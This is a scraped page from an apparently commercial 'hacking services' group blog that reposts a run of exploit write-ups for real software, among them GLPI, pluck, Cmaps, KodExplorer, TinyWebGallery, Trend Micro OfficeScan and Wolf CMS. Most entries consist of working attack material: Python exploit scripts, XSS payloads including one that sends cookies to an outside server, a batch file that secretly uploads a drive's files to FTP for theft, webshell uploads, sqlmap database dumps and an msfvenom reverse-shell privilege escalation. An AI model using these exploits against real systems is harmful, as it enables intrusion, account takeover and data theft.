Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863115632

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: GLPI 9.5.7 - Username Enumeration
# Date: 04/29/2023
# Author: Rafael B.
# Vendor Homepage: https://glpi-project.org/pt-br/
# Affected Versions: GLPI version 9.1 <= 9.5.7
# Software: https://github.com/glpi-project/glpi/releases/download/9.5.7/glpi-9.5.7.tgz


import requests
from bs4 import BeautifulSoup

# Send a GET request to the page to receive the csrf token and the cookie session
response = requests.get('http://127.0.0.1:80/glpi/front/lostpassword.php?lostpassword=1')

# Parse the HTML using BeautifulSoup
soup = BeautifulSoup(response.content, 'html.parser')

# Find the input element with the CSRF token
csrf_input = soup.find('input', {'name': lambda n: n and n.startswith('_glpi_csrf_')})

# Extract the CSRF token if it exists
if csrf_input:
    csrf_token = csrf_input['value']

# Extract the session cookie
session_cookie_value = None
if response.cookies:
    session_cookie_value = next(iter(response.cookies.values()))
# Set the custom url where the GLPI recover password is located 
url = "http://127.0.0.1:80/glpi/front/lostpassword.php"
headers = {"User-Agent": "Windows NT 10.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/glpi/front/lostpassword.php?lostpassword=1", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"}

# Open the email list file and read each line
with open('emails.txt', 'r') as f:
    email_list = f.readlines()

# Loop through the email list and make a POST request for each email
for email in email_list:
    email = email.strip()
    data = {"email": email, "update": "Save", "_glpi_csrf_token": csrf_token}
    cookies = {"glpi_f6478bf118ca2449e9e40b198bd46afe": session_cookie_value}
    freq = requests.post(url, headers=headers, cookies=cookies, data=data)

    # Do a new GET request to get the updated CSRF token and session cookie for the next iteration
    response = requests.get('http://127.0.0.1:80/glpi/front/lostpassword.php?lostpassword=1')
    soup = BeautifulSoup(response.content, 'html.parser')
    csrf_input = soup.find('input', {'name': lambda n: n and n.startswith('_glpi_csrf_')})
    if csrf_input:
        csrf_token = csrf_input['value']
    session_cookie_value = None
    if response.cookies: 
        session_cookie_value = next(iter(response.cookies.values()))

    # Parse the response and grep the match e-mails
    soup = BeautifulSoup(freq.content, 'html.parser')
    div_center = soup.find('div', {'class': 'center'})
    Result = (f"Email: {email}, Result: {div_center.text.strip()}")
    if "An email has been sent to your email address. The email contains information for reset your password." in Result:
        print ("\033[1;32m Email Found! -> " + Result)
HireHackking 
Exploit Title: pluck v4.7.18 - Stored Cross-Site Scripting (XSS)
Application: pluck
Version: 4.7.18
Bugs:  XSS
Technology: PHP
Vendor URL: https://github.com/pluck-cms/pluck
Software Link: https://github.com/pluck-cms/pluck
Date of found: 01-05-2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
steps: 

1. create .svg file.
2. svg file content:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>

3. upload file (http://localhost/pluck-4.7.18/admin.php?action=files)

poc request


POST /pluck-4.7.18/admin.php?action=files HTTP/1.1
Host: localhost
Content-Length: 672
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJMTiFxESCx7aNqmI
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/pluck-4.7.18/admin.php?action=files
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=s34g5lr0qg5m4qh0ph5plmo8de
Connection: close

------WebKitFormBoundaryJMTiFxESCx7aNqmI
Content-Disposition: form-data; name="filefile"; filename="SVG_XSS.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>
------WebKitFormBoundaryJMTiFxESCx7aNqmI
Content-Disposition: form-data; name="submit"

Upload
------WebKitFormBoundaryJMTiFxESCx7aNqmI--



4. go to http://localhost/pluck-4.7.18/files/svg_xss.svg
HireHackking 
# Exploit Title: Companymaps V8.0 - Stored Cross Site Scripting (XSS)
# Date: 27.04.2023
# Exploit Author: Lucas Noki (0xPrototype)
# Vendor Homepage: https://github.com/vogtmh
# Software Link: https://github.com/vogtmh/cmaps
# Version: 8.0
# Tested on: Mac, Windows, Linux
# CVE : CVE-2023-29983

*Steps to reproduce:*
1. Clone the repository and install the application
2. Send a maliciously crafted payload via the "token" parameter to the following endpoint: /rest/update/?token=
3. The payload used is: <script>new+Image().src=`http://YOUR_COLLABORATOR_SERVER/?c=${document.cookie}`</script>
4. Simply visiting the complete URL: http://IP/rest/update/?token=PAYLOAD is enough.
5. Login into the admin panel and go to the auditlog under: /admin/index.php?tab=auditlog
6. Check your collaborator server. You should have a request where the admins cookie is the value of the c parameter

In a real world case you would need to wait for the admin to log into the application and open the auditlog tab.

Special thanks goes out to iCaotix who greatly helped me in getting the environment setup as well as debugging my payload.
HireHackking

Foreword

Not long ago, I had this idea, which is to automatically run a script and upload files in the PC to our customized server. For example, we can specify that all word documents on the USB flash drive are uploaded to our server, which has achieved the purpose of stealing. So let’s see how it is implemented!

Code

@Echo Off

Echo open server ip ftp.up

Echo username ftp.up

Echo password ftp.up

Echo binaryftp.up

Echo promptftp.up

Echo lcd 'E:\*.txt'ftp.up

Echo mput 'E:\*.txt'ftp.up

Echo byeftp.up

FTP -s:ftp.up

del ftp.up /q

Using

Save the file code as a .bat file. After double-clicking to run, all txt files in E disk will be uploaded to the server we specified.

HireHackking

Title: Kage——msf visual remote control platform

HACKER · %s · %s

Kage, a tool that turns msf into a visual remote control platform.
Project address
https://github.com/WayzDev/Kage/
Download and Install
Click me to download~
After downloading, give run permissions.
Start the service
msfrpcd -U msf -P 123456 -a 0.0.0.0
Parameter description: -U: login kage account -P: login kage password -a: msf's IP address (it's very important. If kage and msf are on the same computer, use 0.0.0.0 that is 127.0.0.1)
Start the program and log in to ./Kage.0.1.1-beta_linux.AppImage

Enter your account number and password and corresponding port
After successful login, the following is shown
We can use commands to generate Trojans, or generate Trojans on the platform, according to our specific situation.
Configure listening

Click Create after the configuration is completed
On the target side, successfully run the generated Trojan and view the session.
All kinds of slutty operations
System Information

File Information

Route Information

Install B and pull it ~~~
HireHackking
## Title: KodExplorer v4.51.03 - Pwned-Admin File-Inclusion - Remote Code Execution (RCE) ## Author: nu11secur1ty ## Date: 04.30.2023 ## Vendor: https://kodcloud.com/ ## Software: https://github.com/kalcaddle/KodExplorer/releases/tag/4.51.03 ## Reference: https://portswigger.net/web-security/file-upload ## Description: By using this vulnerability remotely, the malicious pwned_admin can list and manipulate all files inside the server. This is an absolutely DANGEROUS and STUPID decision from the application owner! In this scenario, the attacker prepares the machine for exploitation and sends a link for remote execution by using the CURL protocol to his supporter - another attacker. Then and he waits for execution from his colleague, to mask his action or even more worst than ever. What a nice hack is this! :) STATUS: CRITICAL Vulnerability [+]Exploit: ```CURL curl -s https://pwnedhost.com/KodExplorer/data/User/pwnedadmin/home/desktop/BiggusDickus.php | php curl -s https://pwnedhost.com/KodExplorer/data/User/pwnedadmin/home/desktop/dealdir.php | php ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/kalcaddle/2023/KodExplorerKodExplorer-4.51.03) ## Proof and Exploit: [href](https://streamable.com/98npd0) ## Time spend: 01:15:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
HireHackking

Cmaps v8.0 - SQL injection

HACKER · %s · %s

# Exploit Title: Cmaps v8.0 - SQL injection - Date: 27.04.2023 - Exploit Author: Lucas Noki (0xPrototype) - Vendor Homepage: https://github.com/vogtmh - Software Link: https://github.com/vogtmh/cmaps - Version: 8.0 - Tested on: Mac, Windows, Linux - CVE : CVE-2023-29809 *Description:* The vulnerability found is an SQL injection. The `bookmap` parameter is vulnerable. When visiting the page: http://192.168.0.56/rest/booking/index.php?mode=list&bookmap=test we get the normal JSON response. However if a single quote gets appended to the value of the `bookmap` parameter we get an error message: ```html <b>Warning</b>: mysqli_num_rows() expects parameter 1 to be mysqli_result, bool given in <b>/var/www/html/rest/booking/index.php</b> on line <b>152</b><br /> ``` Now if two single quotes get appended we get the normal response without an error. This confirms the opportunity for sql injection. To really prove the SQL injection we append the following payload: ``` '-(select*from(select+sleep(2)+from+dual)a)--+ ``` The page will sleep for two seconds. This confirms the SQL injection. *Steps to reproduce:* 1. Send the following payload to test the vulnerability: ```'-(select*from(select+sleep(2)+from+dual)a)--+``` 2. If the site slept for two seconds run the following sqlmap command to dump the whole database including the ldap credentials. ```shell python3 sqlmap.py -u "http://<IP>/rest/booking/index.php?mode=list&bookmap=test*" --random-agent --level 5 --risk 3 --batch --timeout=10 --drop-set-cookie -o --dump ``` Special thanks goes out to iCaotix who greatly helped me in getting the environment setup as well as debugging my payload. ## Request to the server: <img src="Screenshot 2023-04-30 at 22.23.51.png" alt="Screenshot 2023-04-30 at 22.23.51" style="zoom:50%;" /> ## Response from the server: Look at the response time. <img src="Screenshot 2023-04-30 at 22.24.35.png" alt="Screenshot 2023-04-30 at 22.24.35" style="zoom:50%;" />
HireHackking
# Exploit Title: Jedox 2020.2.5 - Remote Code Execution via Configurable Storage Path # Date: 28/04/2023 # Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL # Vendor Homepage: https://jedox.com # Version: Jedox 2020.2 (20.2.5) and older # CVE : CVE-2022-47878 Introduction ================= Incorrect input validation for the default storage path variable in the settings page allows remote, authenticated users to specify the location as web root directory. Consecutive file uploads can lead to the execution of arbitrary code. To exploit the vulnerability, the attacker sets the default storage path to the web root. Write-Up ================= See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability. Proof of Concept ================= 1) In the UI in the application settings page the default storage path can be set to any value. This path could be set as the webroot directory of the webserver e.g. /htdocs/app/docroot/. 2) Then any upload/import function can be used to upload a .php webshell file to the webroot. 3) Execute webshell from the webroot directory to obtain RCE.
HireHackking

TinyWebGallery v2.5 - Remote Code Execution (RCE)

HACKER · %s · %s

#Exploit Title: TinyWebGallery v2.5 - Remote Code Execution (RCE) #Application: TinyWebGallery #Version: v2.5 #Bugs: RCE #Technology: PHP #Vendor URL: http://www.tinywebgallery.com/ #Software Link: https://www.tinywebgallery.com/download.php?tinywebgallery=latest #Date of found: 07-05-2023 #Author: Mirabbas Ağalarov #Tested on: Linux 2. Technical Details & POC ======================================== steps: 1. Go to upload image http://localhost/twg25/admin/index.php?action=upload&sview=no&menu=true 2. upload .phar file payload: payload: <?php echo system("cat /etc/passwd"); ?> 3. go to file link poc request: POST /twg25/admin/index.php?action=upload&dir=&order=name&srt=yes&tview=no&sview=no&lang=en HTTP/1.1 Host: localhost Content-Length: 2123 Cache-Control: max-age=0 sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundary53rZRhJinqaMm7Ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/twg25/admin/index.php?action=upload&sview=no&menu=true Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=qc7mfbthpf7tnf32a34p8l766k Connection: close ------WebKitFormBoundary53rZRhJinqaMm7Ip Content-Disposition: form-data; name="token" b2ed5512107a625ef9d5688ced296c61 ------WebKitFormBoundary53rZRhJinqaMm7Ip Content-Disposition: form-data; name="MAX_FILE_SIZE" 2097152 ------WebKitFormBoundary53rZRhJinqaMm7Ip Content-Disposition: form-data; name="confirm" true ------WebKitFormBoundary53rZRhJinqaMm7Ip Content-Disposition: form-data; name="userfile[]"; filename="shell.phar" Content-Type: application/octet-stream <?php echo system("cat /etc/passwd"); ?> ------WebKitFormBoundary53rZRhJinqaMm7Ip Content-Disposition: form-data; name="userfile[]"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundary53rZRhJinqaMm7Ip Content-Disposition: form-data; name="userfile[]"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundary53rZRhJinqaMm7Ip Content-Disposition: form-data; name="userfile[]"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundary53rZRhJinqaMm7Ip Content-Disposition: form-data; name="userfile[]"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundary53rZRhJinqaMm7Ip Content-Disposition: form-data; name="userfile[]"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundary53rZRhJinqaMm7Ip Content-Disposition: form-data; name="userfile[]"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundary53rZRhJinqaMm7Ip Content-Disposition: form-data; name="userfile[]"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundary53rZRhJinqaMm7Ip Content-Disposition: form-data; name="userfile[]"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundary53rZRhJinqaMm7Ip Content-Disposition: form-data; name="userfile[]"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundary53rZRhJinqaMm7Ip Content-Disposition: form-data; name="twgsize" 100000 ------WebKitFormBoundary53rZRhJinqaMm7Ip Content-Disposition: form-data; name="twgquality" 80 ------WebKitFormBoundary53rZRhJinqaMm7Ip-- http://localhost/twg25/pictures/shell.phar
HireHackking

Cameleon CMS 2.7.4 - Persistent Stored XSS in Post Title

HACKER · %s · %s

# Exploit Title: Authenticated Persistent XSS in Cameleon CMS 2.7.4 # Google Dork: intext:"Camaleon CMS is a free and open-source tool and a fexible content management system (CMS) based on Ruby on Rails" # Date: 2023-10-05 # Exploit Author: Yasin Gergin # Vendor Homepage: http://camaleon.tuzitio.com # Software Link: https://github.com/owen2345/camaleon-cms # Version: 2.7.4 # Tested on: Linux kali 6.1.0-kali7-amd64 # CVE : - --- Description --- http://127.0.0.1:3000/admin/login - Login as a Admin Under Post tab click on "Create New" While creating the post set Title as "><svg/onmouseover=alert(document.cookie)> http://127.0.0.1:3000/admin/post_type/2/posts - Post data will be sent to this url -- POST DATA -- POST /admin/post_type/2/posts HTTP/1.1 Host: 127.0.0.1:3000 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://127.0.0.1:3000/admin/post_type/2/posts/new Content-Type: application/x-www-form-urlencoded Content-Length: 666 Origin: http://127.0.0.1:3000 Connection: keep-alive Cookie: _my_project_session=w4yj2Y%2FqHaXYDhwwBDnYsyQUc6AtLUnItJ3MGHBV1yS40xwTgjfvlBZVNgqKIvg1W58e0mxyW4OcBk0XwJRZ90j6SmCHG1KJG9ppBKk%2FdKGDboPCRBq40qKhHnkssRPCgRgIjs69EG7htSdUY%2Bbgit9XTESgvSusBBhsIED%2BLH0VBOBL6H%2FV4Mp59NEP7LhP%2FHmlulEa7I43J8HKpStDj2HiXxA5ZghvSkvpfQpN2d047jLhl71CUcW7pHxmJ4uAdY5ip5OTIhJG9TImps5TbIUrOHyE9vKp1LXzdmbNNi2GI5utUUsURLGUtaN7Fam3Kpi8IqEaBA%3D%3D--8ZKl2%2F6OzLCXn2qA--%2BtMhAwdbdfxNzoSPajkZrg%3D%3D; auth_token=iRDUqXfbhmibLIM5mrHelQ&Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A102.0%29+Gecko%2F20100101+Firefox%2F102.0&127.0.0.1; phpMyAdmin=4f5ad7484490645a49d171c03e15dab2; pma_lang=en Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 authenticity_token=vuAzhnu6UocDR6zpeeaQxvlVjdmIMr9LPrLEcK5FGVAEYQamLHI1fAG7jBQ3FwEX_ACWedzoX72WAUxqj5wKrQ&post%5Bdraft_id%5D=&post%5Bslug%5D=svgonmouseoveralertdocumentcookie&meta%5Bslug%5D=svgonmouseoveralertdocumentcookie&post%5Btitle%5D=%22%3E%3Csvg%2Fonmouseover%3Dalert%28document.cookie%29%3E&post%5Bcontent%5D=%3Cp%3Eqwe%3C%2Fp%3E&meta%5Bsummary%5D=qwe&options%5Bseo_title%5D=&options%5Bkeywords%5D=&options%5Bseo_description%5D=&options%5Bseo_author%5D=&options%5Bseo_image%5D=&options%5Bseo_canonical%5D=&commit=Create&post%5Bstatus%5D=published&meta%5Btemplate%5D=&meta%5Bhas_comments%5D=0&meta%5Bhas_comments%5D=1&categories%5B%5D=6&tags=&meta%5Bthumb%5D= -- POST DATA -- Then view the post you've created by clicking on "View Page" move your mouse cursor onto post title. XSS will popup.
HireHackking

Optoma 1080PSTX Firmware C02 - Authentication Bypass

HACKER · %s · %s

# Exploit Title: Optoma 1080PSTX Firmware C02 - Authentication Bypass # Date: 2023/05/09 # Exploit Author: Anthony Cole # Contact: http://twitter.com/acole76 # Website: http://twitter.com/acole76 # Vendor Homepage: http://optoma.com # Version: Optoma 1080PSTX Firmware C02 # Tested on: N/A # CVE : CVE-2023-27823 Details By default the web interface of the 1080PSTX requires a username and password to access the application control panel. However, an attacker, on the same network, can bypass it by manually setting the "atop" cookie to the value of "1". GET /index.asp HTTP/1.1 Host: projector Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: atop=1 Connection: close
HireHackking

PnPSCADA v2.x - Unauthenticated PostgreSQL Injection

HACKER · %s · %s

# Exploit Title: PnPSCADA v2.x - Unauthenticated PostgreSQL Injection # Date: 15/5/2023 # Exploit Author: Momen Eldawakhly (Cyber Guy) at Samurai Digital Security Ltd # Vendor Homepage: https://pnpscada.com/ # Version: PnPSCADA (cross platforms): v2.x # Tested on: Unix # CVE : CVE-2023-1934 # Proof-of-Concept: https://drive.google.com/drive/u/0/folders/1r_HMoaU3P0t-04gMM90M0hfdBRi_P0_8 SQLi crashing point: GET /hitlogcsv.isp?userids=1337'&startdate= 2022-12-138200083A0093A00&enddate=2022-12-138201383A1783A00 HTTP/1.1 Cache-Control: no-cache User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14 Host: vulnerablepnpscada.int Accept: */* Accept-Encoding: gzip, deflate Connection: close
HireHackking

WBiz Desk 1.2 - SQL Injection

HACKER · %s · %s

[#] Exploit Title: WBiz Desk 1.2 - SQL Injection [#] Exploit Date: May 12, 2023. [#] CVSS 3.1: 6.4 (Medium) [#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N [#] Tactic: Initial Access (TA0001) [#] Technique: Exploit Public-Facing Application (T1190) [#] Application Name: WBiz Desk [#] Application Version: 1.2 [#] Link: https://www.codester.com/items/5641/wbiz-desk-simple-and-effective-help-desk-system [#] Author: h4ck3r - Faisal Albuloushi [#] Contact: SQL@hotmail.co.uk [#] Blog: https://www.0wl.tech [#] 3xploit: [path]//ticket.php?tk=[SQL Injection] [#] 3xample: [path]/ticket.php?tk=83' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6a6b71,0x534d6e485a74664750746b7553746a556b414e7064624b7672626b42454c74674f5669436a466a53,0x71626b6b71),NULL,NULL,NULL-- - [#] Notes: - The vulnerability requires a non-admin privilege (normal) user to be exploited.
HireHackking

Trend Micro OfficeScan Client 10.0 - ACL Service LPE

HACKER · %s · %s

# Exploit Title: Trend Micro OfficeScan Client 10.0 - ACL Service LPE # Date: 2023/05/04 # Exploit Author: msd0pe # Vendor Homepage: https://www.trendmicro.com # My Github: https://github.com/msd0pe-1 Trend Micro OfficeScan Client: Versions =< 10.0 contains wrong ACL rights on the OfficeScan client folder which allows attackers to escalate privileges to the system level through the services. This vulnerabily does not need any privileges access. [1] Verify the folder rights: > icacls "C:\Program Files (x86)\Trend Micro\OfficeScan Client" C:\Program Files (x86)\Trend Micro\OfficeScan Client NT SERVICE\TrustedInstaller:(F) NT SERVICE\TrustedInstaller:(CI)(IO)(F) NT AUTHORITY\SYSTEM:(F) NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F) BUILTIN\Administrators:(F) BUILTIN\Administrators:(OI)(CI)(IO)(F) BUILTIN\Users:(F) BUILTIN\Users:(OI)(CI)(IO)(F) CREATOR OWNER:(OI)(CI)(IO)(F) APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(RX) APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(IO) [2] Get informations about the services: > sc qc tmlisten [SC] QueryServiceConfig SUCCESS SERVICE_NAME: tmlisten TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\tmlisten.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : OfficeScan NT Listener DEPENDENCIES : Netman : WinMgmt SERVICE_START_NAME : LocalSystem OR > sc qc ntrtscan SERVICE_NAME: ntrtscan TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\ntrtscan.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : OfficeScan NT RealTime Scan DEPENDENCIES : SERVICE_START_NAME : LocalSystem [3] Generate a reverse shell: > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o tmlisten.exe OR > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o ntrtscan.exe [4] Upload the reverse shell to C:\Program Files(x86)\Trend Micro\OfficeScan Client\tmlisten.exe OR C:\Program Files(x86)\Trend Micro\OfficeScan Client\ntrtscan.exe [5] Start listener > nc -lvp 4444 [6] Reboot the service/server > sc stop tmlisten > sc start tmlisten OR > sc stop ntrtscan > sc start ntrtscan OR > shutdown /r [7] Enjoy ! 192.168.1.102: inverse host lookup failed: Unknown host connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309 Microsoft Windows [Version 10.0.19045.2130] (c) Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system
HireHackking

Screen SFT DAB 600/C - Authentication Bypass Account Creation

HACKER · %s · %s

#!/usr/bin/env python3 # Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Account Creation # Exploit Author: LiquidWorm # # # Vendor: DB Elettronica Telecomunicazioni SpA # Product web page: https://www.screen.it | https://www.dbbroadcast.com # https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/ # Affected version: Firmware: 1.9.3 # Bios firmware: 7.1 (Apr 19 2021) # Gui: 2.46 # FPGA: 169.55 # uc: 6.15 # # Summary: Screen's new radio DAB Transmitter is reaching the highest # technology level in both Digital Signal Processing and RF domain. # SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the # digital adaptive precorrection and configuatio flexibility, the Hot # Swap System technology, the compactness and the smart system design, # the SFT DAB are advanced transmitters. They support standards DAB, # DAB+ and T-DMB and are compatible with major headend brands. # # Desc: The application suffers from a weak session management that can # allow an attacker on the same network to bypass these controls by reusing # the same IP address assigned to the victim user (NAT) and exploit crucial # operations on the device itself. By abusing the IP address property that # is binded to the Session ID, one needs to await for such an established # session and issue unauthorized requests to the vulnerable API to manage # and/or manipulate the affected transmitter. # # Tested on: Keil-EWEB/2.1 # MontaVista® Linux® Carrier Grade eXpress (CGX) # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2023-5771 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5771.php # # # 19.03.2023 # import hashlib,datetime########## import requests,colorama######### from colorama import Fore, Style# colorama.init() print(Fore.RED+Style.BRIGHT+ ''' ██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████ ██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██ ██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██ ''' +Style.RESET_ALL) print(Fore.WHITE+Style.BRIGHT+ ''' ZSL and the Producers insist that no one submit any exploits of themselfs or others performing any dangerous activities. We will not open or view them. ''' +Style.RESET_ALL) s=datetime.datetime.now() s=s.strftime('%d.%m.%Y %H:%M:%S') print('Starting API XPL -',s) t=input('Enter transmitter ip: ') u=input('Enter desired username: ') p=input('Enter desired password: ') e='/system/api/userManager.cgx' m5=hashlib.md5() m5.update(p.encode('utf-8')) h=m5.hexdigest() print('Your sig:',h) print('Calling object: ssbtObj') print('CGX fastcall: userManager::newUser') t='http://'+t+e bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', 'Accept':'application/json, text/plain, */*', 'Accept-Language':'ku-MK,en;q=0.9', 'Accept-Encoding':'gzip, deflate', 'User-Agent':'Dabber++', 'Connection':'close'} j={'ssbtIdx':0, 'ssbtType':'userManager', 'ssbtObj':{ 'newUser':{ 'password':h, 'type':'OPERATOR', 'username':u } }, } r=requests.post(t,headers=bh,json=j) if r.status_code==200: print('Done.') else: print('Error') exit(-5)
HireHackking

Wolf CMS 0.8.3.1 - Remote Code Execution (RCE)

HACKER · %s · %s

# Exploit Title: Wolf CMS 0.8.3.1 - Remote Code Execution (RCE) # Date: 2023-05-02 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://wolf-cms.readthedocs.io # Software Link: https://github.com/wolfcms/wolfcms # Version: 0.8.3.1 # Tested on: Kali Linux ### Steps to Reproduce ### # Firstly, go to the "Files" tab. # Click on the "Create new file" button and create a php file (e.g: shell.php) # Then, click on the file you created to edit it. # Now, enter your shell code and save the file. # Finally, go to https://localhost/wolfcms/public/shell.php ### There's your shell! ###
HireHackking

Jedox 2022.4.2 - Code Execution via RPC Interfaces

HACKER · %s · %s

